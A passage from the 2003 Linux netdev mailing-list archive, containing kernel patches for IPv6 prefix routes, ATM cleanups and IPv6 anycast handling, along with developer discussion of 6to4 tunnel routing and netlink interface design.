ip6_route_add(&rtmsg, NULL); } @@ -916,7 +916,7 @@ struct in6_addr addr; ipv6_addr_set(&addr, htonl(0xFE800000), 0, 0, 0); - addrconf_prefix_route(&addr, 64, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&addr, 64, dev, 0, 0); } static struct inet6_dev *addrconf_add_dev(struct net_device *dev) @@ -1008,7 +1008,8 @@ } } else if (pinfo->onlink && valid_lft) { addrconf_prefix_route(&pinfo->prefix, pinfo->prefix_len, - dev, rt_expires, RTF_ADDRCONF|RTF_EXPIRES); + dev, rt_expires, + RTF_ADDRCONF|RTF_EXPIRES|RTF_PREFIX_RT); } if (rt) dst_release(&rt->u.dst); @@ -1054,7 +1055,7 @@ return; } - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, RTF_ADDRCONF|RTF_PREFIX_RT); } if (ifp && valid_lft == 0) { @@ -1166,7 +1167,7 @@ ifp = ipv6_add_addr(idev, pfx, plen, scope, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); return 0; } @@ -1341,7 +1342,7 @@ ifp = ipv6_add_addr(idev, addr, 64, IFA_LINK, IFA_F_PERMANENT); if (!IS_ERR(ifp)) { - addrconf_dad_start(ifp); + addrconf_dad_start(ifp, 0); in6_ifa_put(ifp); } } @@ -1578,8 +1579,7 @@ memset(&rtmsg, 0, sizeof(struct in6_rtmsg)); rtmsg.rtmsg_type = RTMSG_NEWROUTE; rtmsg.rtmsg_metric = IP6_RT_PRIO_ADDRCONF; - rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_ADDRCONF | - RTF_DEFAULT | RTF_UP); + rtmsg.rtmsg_flags = (RTF_ALLONLINK | RTF_DEFAULT | RTF_UP); rtmsg.rtmsg_ifindex = ifp->idev->dev->ifindex; @@ -1593,7 +1593,7 @@ /* * Duplicate Address Detection */ -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_start(struct inet6_ifaddr *ifp, int flags) { struct net_device *dev; unsigned long rand_num; @@ -1603,7 +1603,7 @@ addrconf_join_solict(dev, &ifp->addr); if (ifp->prefix_len != 128 && (ifp->flags&IFA_F_PERMANENT)) - addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, RTF_ADDRCONF); + addrconf_prefix_route(&ifp->addr, ifp->prefix_len, dev, 0, flags); net_srandom(ifp->addr.s6_addr32[3]); rand_num = net_random() % (ifp->idev->cnf.rtr_solicit_delay ? : 1); @@ -1888,7 +1888,7 @@ ifm = NLMSG_DATA(nlh); ifm->ifa_family = AF_INET6; ifm->ifa_prefixlen = ifa->prefix_len; - ifm->ifa_flags = ifa->flags; + ifm->ifa_flags = ifa->flags | ifa->idev->if_flags; ifm->ifa_scope = RT_SCOPE_UNIVERSE; if (ifa->scope&IFA_HOST) ifm->ifa_scope = RT_SCOPE_HOST; diff -ruN linux-2.4.21.org/net/ipv6/ndisc.c test/linux.2.4.21/net/ipv6/ndisc.c --- linux-2.4.21.org/net/ipv6/ndisc.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/ndisc.c 2003-07-14 15:09:28.000000000 -0700 @@ -940,6 +940,16 @@ */ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * receieved RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED| + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); diff -ruN linux-2.4.21.org/net/ipv6/route.c test/linux.2.4.21/net/ipv6/route.c --- linux-2.4.21.org/net/ipv6/route.c 2003-06-13 07:51:39.000000000 -0700 +++ test/linux.2.4.21/net/ipv6/route.c 2003-07-16 11:09:45.000000000 -0700 @@ -1516,13 +1516,20 @@ struct in6_addr *src, int iif, int type, u32 pid, u32 seq, - struct nlmsghdr *in_nlh) + struct nlmsghdr *in_nlh, int prefix) { struct rtmsg *rtm; struct nlmsghdr *nlh; unsigned char *b = skb->tail; struct rta_cacheinfo ci; + if (prefix) { /* user wants prefix routes only */ + if (!(rt->rt6i_flags & RTF_PREFIX_RT)) { + /* success since this is not a prefix route */ + return 1; + } + } + if (!pid && in_nlh) { pid = in_nlh->nlmsg_pid; } @@ -1603,10 +1610,16 @@ static int rt6_dump_route(struct rt6_info *rt, void *p_arg) { struct rt6_rtnl_dump_arg *arg = (struct rt6_rtnl_dump_arg *) p_arg; + struct rtmsg *rtm; + int prefix; + rtm = NLMSG_DATA(arg->cb->nlh); + if (rtm) + prefix = (rtm->rtm_flags & RTM_F_PREFIX) != 0; + else prefix = 0; return rt6_fill_node(arg->skb, rt, NULL, NULL, 0, RTM_NEWROUTE, NETLINK_CB(arg->cb->skb).pid, arg->cb->nlh->nlmsg_seq, - NULL); + NULL, prefix); } static int fib6_dump_node(struct fib6_walker_t *w) @@ -1757,7 +1770,7 @@ fl.nl_u.ip6_u.saddr, iif, RTM_NEWROUTE, NETLINK_CB(in_skb).pid, - nlh->nlmsg_seq, nlh); + nlh->nlmsg_seq, nlh, 0); if (err < 0) { err = -EMSGSIZE; goto out_free; @@ -1783,7 +1796,7 @@ netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, ENOBUFS); return; } - if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh) < 0) { + if (rt6_fill_node(skb, rt, NULL, NULL, 0, event, 0, 0, nlh, 0) < 0) { kfree_skb(skb); netlink_set_err(rtnl, 0, RTMGRP_IPV6_ROUTE, EINVAL); return; From chas@locutus.cmf.nrl.navy.mil Wed Jul 16 14:20:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 14:20:49 -0700 (PDT) Received: from ginger.cmf.nrl.navy.mil (ginger.cmf.nrl.navy.mil [134.207.10.161]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GLKcFl002265 for ; Wed, 16 Jul 2003 14:20:39 -0700 Received: from locutus.cmf.nrl.navy.mil (locutus.cmf.nrl.navy.mil [134.207.10.66]) by ginger.cmf.nrl.navy.mil (8.12.7/8.12.7) with ESMTP id h6GLKWsG023003; Wed, 16 Jul 2003 17:20:32 -0400 (EDT) Message-Id: <200307162120.h6GLKWsG023003@ginger.cmf.nrl.navy.mil> To: davem@redhat.com cc: netdev@oss.sgi.com Subject: [PATCH][ATM] minor cleanups for 2.5 Reply-To: chas3@users.sourceforge.net Date: Wed, 16 Jul 2003 17:18:04 -0400 From: chas williams X-Spam-Score: () hits=0.5 X-Virus-Scanned: NAI Completed X-Scanned-By: MIMEDefang 2.30 (www . roaringpenguin . com / mimedefang) X-archive-position: 4113 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: chas@cmf.nrl.navy.mil Precedence: bulk X-list: netdev just some cleanup work for the 2.5 kernels. one biggish oopsy -- never checked the return code from atm_dev_lookup() in vcc_connect. found it last week, and someone else found it recently as well. the lec timers now use mod_timer() and go away with del_timer_sync() (and how does __inline__ work when its the timer function?) [atm]: make sigd_sleep conditional with WAIT_FOR_DEMON # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1364 -> 1.1365 # net/atm/signaling.c 1.17 -> 1.18 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/21 chas@relax.cmf.nrl.navy.mil 1.1365 # signaling.c: # make sigd_sleep conditional with WAIT_FOR_DEMON # -------------------------------------------- # diff -Nru a/net/atm/signaling.c b/net/atm/signaling.c --- a/net/atm/signaling.c Mon Jun 23 09:45:13 2003 +++ b/net/atm/signaling.c Mon Jun 23 09:45:13 2003 @@ -31,7 +31,9 @@ struct atm_vcc *sigd = NULL; +#ifdef WAIT_FOR_DEMON static DECLARE_WAIT_QUEUE_HEAD(sigd_sleep); +#endif static void sigd_put_skb(struct sk_buff *skb) @@ -254,6 +256,8 @@ vcc_insert_socket(vcc->sk); set_bit(ATM_VF_META,&vcc->flags); set_bit(ATM_VF_READY,&vcc->flags); +#ifdef WAIT_FOR_DEMON wake_up(&sigd_sleep); +#endif return 0; } [atm]: return ENODEV if !dev # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1413 -> 1.1414 # net/atm/common.c 1.43 -> 1.44 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/16 chas@relax.cmf.nrl.navy.mil 1.1414 # return ENODEV if !dev # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Wed Jul 16 17:06:05 2003 +++ b/net/atm/common.c Wed Jul 16 17:06:05 2003 @@ -478,6 +478,8 @@ return -EINVAL; if (itf != ATM_ITF_ANY) { dev = atm_dev_lookup(itf); + if (!dev) + return -ENODEV; error = __vcc_connect(vcc, dev, vpi, vci); if (error) { atm_dev_put(dev); [atm]: if !IFF_UP drop the frames # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1380.1.43 -> 1.1380.1.44 # net/atm/lec.c 1.33 -> 1.34 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/08 chas@relax.cmf.nrl.navy.mil 1.1380.1.44 # if !IFF_UP drop the frames # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Wed Jul 16 17:05:18 2003 +++ b/net/atm/lec.c Wed Jul 16 17:05:18 2003 @@ -692,10 +692,11 @@ atm_return(vcc,skb->truesize); if (*(uint16_t *)skb->data == htons(priv->lecid) || - !priv->lecd) { + !priv->lecd || + !(dev->flags & IFF_UP)) { /* Probably looping back, or if lecd is missing, lecd has gone down */ - DPRINTK("Ignoring loopback frame...\n"); + DPRINTK("Ignoring frame...\n"); dev_kfree_skb(skb); return; } [atm]: cleanup timers in lec # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1380.1.44 -> 1.1380.1.45 # net/atm/lec.c 1.34 -> 1.35 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/08 chas@relax.cmf.nrl.navy.mil 1.1380.1.45 # timer cleanup # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Wed Jul 16 17:05:30 2003 +++ b/net/atm/lec.c Wed Jul 16 17:05:30 2003 @@ -1031,7 +1031,7 @@ #define LEC_ARP_REFRESH_INTERVAL (3*HZ) static void lec_arp_check_expire(unsigned long data); -static __inline__ void lec_arp_expire_arp(unsigned long data); +static void lec_arp_expire_arp(unsigned long data); void dump_arp_table(struct lec_priv *priv); /* @@ -1371,7 +1371,7 @@ struct lec_arp_table *entry, *next; int i; - del_timer(&priv->lec_arp_timer); + del_timer_sync(&priv->lec_arp_timer); /* * Remove all entries @@ -1386,7 +1386,7 @@ entry = priv->lec_arp_empty_ones; while(entry) { next = entry->next; - del_timer(&entry->timer); + del_timer_sync(&entry->timer); lec_arp_clear_vccs(entry); kfree(entry); entry = next; @@ -1395,7 +1395,7 @@ entry = priv->lec_no_forward; while(entry) { next = entry->next; - del_timer(&entry->timer); + del_timer_sync(&entry->timer); lec_arp_clear_vccs(entry); kfree(entry); entry = next; @@ -1404,7 +1404,7 @@ entry = priv->mcast_fwds; while(entry) { next = entry->next; - del_timer(&entry->timer); + /* No timer, LANEv2 7.1.20 and 2.3.5.3 */ lec_arp_clear_vccs(entry); kfree(entry); entry = next; @@ -1478,8 +1478,6 @@ entry = (struct lec_arp_table *)data; - del_timer(&entry->timer); - DPRINTK("lec_arp_expire_arp\n"); if (entry->status == ESI_ARP_PENDING) { if (entry->no_tries <= entry->priv->max_retry_count) { @@ -1489,8 +1487,7 @@ send_to_lecd(entry->priv, l_arp_xmt, entry->mac_addr, NULL, NULL); entry->no_tries++; } - entry->timer.expires = jiffies + (1*HZ); - add_timer(&entry->timer); + mod_timer(&entry->timer, jiffies + (1*HZ)); } } @@ -1562,8 +1559,6 @@ unsigned long time_to_check; int i; - del_timer(&priv->lec_arp_timer); - DPRINTK("lec_arp_check_expire %p,%d\n",priv, atomic_read(&priv->lec_arp_users)); DPRINTK("expire: eo:%p nf:%p\n",priv->lec_arp_empty_ones, @@ -1621,8 +1616,8 @@ } lec_arp_put(priv); } - priv->lec_arp_timer.expires = jiffies + LEC_ARP_REFRESH_INTERVAL; - add_timer(&priv->lec_arp_timer); + + mod_timer(&priv->lec_arp_timer, jiffies + LEC_ARP_REFRESH_INTERVAL); } /* * Try to find vcc where mac_address is attached. From mika.liljeberg@welho.com Wed Jul 16 15:27:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 15:27:52 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GMRfFl003731 for ; Wed, 16 Jul 2003 15:27:43 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6GMT0LH022510; Thu, 17 Jul 2003 01:29:00 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6GMSxtS022509; Thu, 17 Jul 2003 01:28:59 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: kuznet@ms2.inr.ac.ru Cc: Pekka Savola , davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <200307151428.SAA08491@dub.inr.ac.ru> References: <200307151428.SAA08491@dub.inr.ac.ru> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058394538.5778.17.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 01:28:58 +0300 X-archive-position: 4114 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev Alexey, > And this silly combination is still _better_ than 6to4 address, which > contains redundant information, which can be mixed up with real _IPv6_ > 6to4 addresses and whihc contains IPv4 address in some place which > used to be identification of a network prefix. While I see where you're coming from, I don't really understand what the fuss is all about. IMHO, the real hack is being able to specify the tunnel endpoint using a gateway route in the first place. Whether that gateway address is IPv4-compatible or a 6to4 address is just a minor detail. I view my patch as a simple convenience to the user, extending a hack that already exists. A more "correct" way would be to specify the gateway address in the remote address field of the point-to-point SIT interface, and live with the fact that you need a separate SIT interface for each 6to4 gateway that you want to tunnel to. This already works, so the IPv4-compat route hack is actually redundant. My understanding was that it is there simply for convenience. MikaL From kuznet@ms2.inr.ac.ru Wed Jul 16 16:28:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 16:28:44 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GNSZFl005158 for ; Wed, 16 Jul 2003 16:28:36 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA12405; Thu, 17 Jul 2003 03:28:20 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307162328.DAA12405@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: mika.liljeberg@welho.com (Mika Liljeberg) Date: Thu, 17 Jul 2003 03:28:20 +0400 (MSD) Cc: pekkas@netcore.fi, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <1058394538.5778.17.camel@hades> from "Mika Liljeberg" at Jul 17, 2003 01:28:58 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4115 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > While I see where you're coming from, I don't really understand what the > fuss is all about. The issue definitely does not worth of time already spent for the discussion. All the fuss is about the fact that this code lived and will live for years. If we allowed to add small tricks of this kind, it would end up as a full mess. Each convenience trick must have a logical background. I have been asked for an opinion, this is my opinion: 6to4 is wrong, addresses in format of 6over4 are natural, if they are deprecated, another and even more natural variant is use of link-local format, fe80::a.b.c.d. Alexey From mika.liljeberg@welho.com Wed Jul 16 16:37:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 16:38:12 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GNbtFl005602 for ; Wed, 16 Jul 2003 16:37:56 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6GNd3LH022679; Thu, 17 Jul 2003 02:39:03 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6GNd2bd022678; Thu, 17 Jul 2003 02:39:02 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: kuznet@ms2.inr.ac.ru Cc: pekkas@netcore.fi, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <200307162328.DAA12405@dub.inr.ac.ru> References: <200307162328.DAA12405@dub.inr.ac.ru> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058398742.5778.26.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 02:39:02 +0300 X-archive-position: 4116 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-17 at 02:28, kuznet@ms2.inr.ac.ru wrote: > > While I see where you're coming from, I don't really understand what the > > fuss is all about. > > The issue definitely does not worth of time already spent for the discussion. I agree. :) > All the fuss is about the fact that this code lived and will live for years. > If we allowed to add small tricks of this kind, it would end up as a full mess. > Each convenience trick must have a logical background. So what's the background for having the hack to specify a tunnel EP with a gateway route? > I have been asked for an opinion, this is my opinion: 6to4 is wrong, > addresses in format of 6over4 are natural, if they are deprecated, > another and even more natural variant is use of link-local format, > fe80::a.b.c.d. IPv4-mapped would be semantically correct. It definately can't be confused with any real IPv6 address. MikaL From kuznet@ms2.inr.ac.ru Wed Jul 16 16:41:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 16:41:32 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GNfRFl005972 for ; Wed, 16 Jul 2003 16:41:28 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA12466; Thu, 17 Jul 2003 03:41:07 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307162341.DAA12466@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: yoshfuji@linux-ipv6.org (YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=) Date: Thu, 17 Jul 2003 03:41:07 +0400 (MSD) Cc: krkumar@us.ibm.com, davem@redhat.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org, linux-net@vger.kernel.org In-Reply-To: <20030716.173926.81875946.yoshfuji@linux-ipv6.org> from "YOSHIFUJIHideaki/=?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?=" at Jul 16, 2003 05:39:26 PM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4117 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > My suggestion is: > - create L3 per-interface RTM, say, RTM_xxxIFACE. > - provide inet_device / inet6_dev things via this RTM. > e.g. per-interface statistics, flags etc. I agree for all 100%. I understand your attitude now. Alexey From kuznet@ms2.inr.ac.ru Wed Jul 16 16:58:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 16:58:38 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6GNwTFl006974 for ; Wed, 16 Jul 2003 16:58:30 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA12485; Thu, 17 Jul 2003 03:58:15 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307162358.DAA12485@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: mika.liljeberg@welho.com (Mika Liljeberg) Date: Thu, 17 Jul 2003 03:58:15 +0400 (MSD) Cc: pekkas@netcore.fi, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <1058398742.5778.26.camel@hades> from "Mika Liljeberg" at Jul 17, 2003 02:39:02 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4118 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > So what's the background for having the hack to specify a tunnel EP with > a gateway route? Technically, it allows to avoid creating hundreds of devices to maintain lots of tunnels. Actually, it exists due to historical reasons. ipip and ipip6 tunnels used the trick from the very beginning. But f.e. ipgre device was new, so it uses more correct approach: actual mapping cross address families can be made via neighbour tables. But this requires to know an IPv6 address of the nexthop. Clean, but inconvenient. :-) Alexey From kuznet@ms2.inr.ac.ru Wed Jul 16 17:04:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 17:04:14 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H049Fl007393 for ; Wed, 16 Jul 2003 17:04:10 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA12843; Thu, 17 Jul 2003 04:03:56 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170003.EAA12843@dub.inr.ac.ru> Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked To: pekkas@netcore.fi (Pekka Savola) Date: Thu, 17 Jul 2003 04:03:56 +0400 (MSD) Cc: davem@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at Jul 16, 2003 09:03:57 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4119 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > > > What happens when you do "ping6 3FFE:FFFF:A:B::1" ? > > > > Hey, you have lost track, rewind several mails ago. > > Nope. I'm just pointing out the general concept. > > > Of course, ping and > > any other protocols will work, how can it not work? :-) > > It has been made shown to work on other platforms, so why not Linux? ping did, does and will work and I do not understand what you want to say or ask. Do you want to know how it works? Well, IPv6 stack looks up the address in routing tables, finds the route, sees that it is on-link, sends NDISC, receiver replies, we create a frame and send the echo request. To continue? :-) Alexey From kuznet@ms2.inr.ac.ru Wed Jul 16 17:38:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 17:38:21 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H0cFFl008691 for ; Wed, 16 Jul 2003 17:38:16 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA12945; Thu, 17 Jul 2003 04:38:00 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170038.EAA12945@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: krkumar@us.ibm.com (Krishna Kumar) Date: Thu, 17 Jul 2003 04:38:00 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org In-Reply-To: <3F15E86F.2030707@us.ibm.com> from "Krishna Kumar" at Jul 16, 2003 05:06:07 PM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4120 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > This is sort of what I had originally, so I should be able to change > it to do this quite easily. I didn't like the earlier suggestion of > using existing RTM_xxxLINK with RTM_xxxIFACE (since it was dev generic), > but having a new interface RTM_xxxIFACE sounds good to me. Actually, the original plan was to use ifli_family to query something or to direct a request to a specific interface on some netdevice. I wanted to reserve IFLI_PROTINFO attribute to encapsulate information private for specific family. It was not realized mostly because of absense of such information. Maybe, you will want to resurrect this. Alexey From kuznet@ms2.inr.ac.ru Wed Jul 16 19:24:10 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 16 Jul 2003 19:24:22 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6H2O8Fl011730 for ; Wed, 16 Jul 2003 19:24:09 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id GAA13064; Thu, 17 Jul 2003 06:23:52 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307170223.GAA13064@dub.inr.ac.ru> Subject: Re: Anycast usage, final diagnosis? (was: IPv6: Fix broken anycast usage) To: kuznet@dub.inr.ac.ru (kuznet) Date: Thu, 17 Jul 2003 06:23:52 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, mika.liljeberg@welho.com, pekkas@netcore.fi, netdev@oss.sgi.com In-Reply-To: from "kuznet" at Jul 17, 2003 05:12:47 AM X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4121 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! Here it is. Please, review and complain. 1. Recognition of reserved anycasts is removed from ipv6_addr_type(). Flag IPV6_ADDR_ANYCAST is removed as well. 2. Some meaningless noop code checking for anycast which are not going to happen is removed from ndisc.c 3. ipv6_unicast_destination() replaces suboptimal ipv6_chk_acast_addr() in data paths. Alexey # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1469 -> 1.1470 # net/ipv6/anycast.c 1.5 -> 1.6 # include/net/ip6_route.h 1.10 -> 1.11 # net/ipv6/icmp.c 1.36 -> 1.37 # net/ipv6/tcp_ipv6.c 1.64 -> 1.65 # net/ipv6/ndisc.c 1.52 -> 1.53 # net/ipv6/route.c 1.50 -> 1.51 # include/net/ipv6.h 1.22 -> 1.23 # net/ipv6/addrconf.c 1.58 -> 1.59 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/07/17 kuznet@oops.inr.ac.ru 1.1470 # Many files: # sanitize IPv6 anycast address support # -------------------------------------------- # diff -Nru a/include/net/ip6_route.h b/include/net/ip6_route.h --- a/include/net/ip6_route.h Thu Jul 17 06:13:09 2003 +++ b/include/net/ip6_route.h Thu Jul 17 06:13:09 2003 @@ -45,7 +45,8 @@ void *rtattr); extern int ip6_rt_addr_add(struct in6_addr *addr, - struct net_device *dev); + struct net_device *dev, + int anycast); extern int ip6_rt_addr_del(struct in6_addr *addr, struct net_device *dev); @@ -116,6 +117,13 @@ np->daddr_cache = daddr; np->dst_cookie = rt->rt6i_node ? rt->rt6i_node->fn_sernum : 0; write_unlock(&sk->sk_dst_lock); +} + +static inline int ipv6_unicast_destination(struct sk_buff *skb) +{ + struct rt6_info *rt = (struct rt6_info *) skb->dst; + + return rt->rt6_flags & RTF_LOCAL; } #endif diff -Nru a/include/net/ipv6.h b/include/net/ipv6.h --- a/include/net/ipv6.h Thu Jul 17 06:13:09 2003 +++ b/include/net/ipv6.h Thu Jul 17 06:13:09 2003 @@ 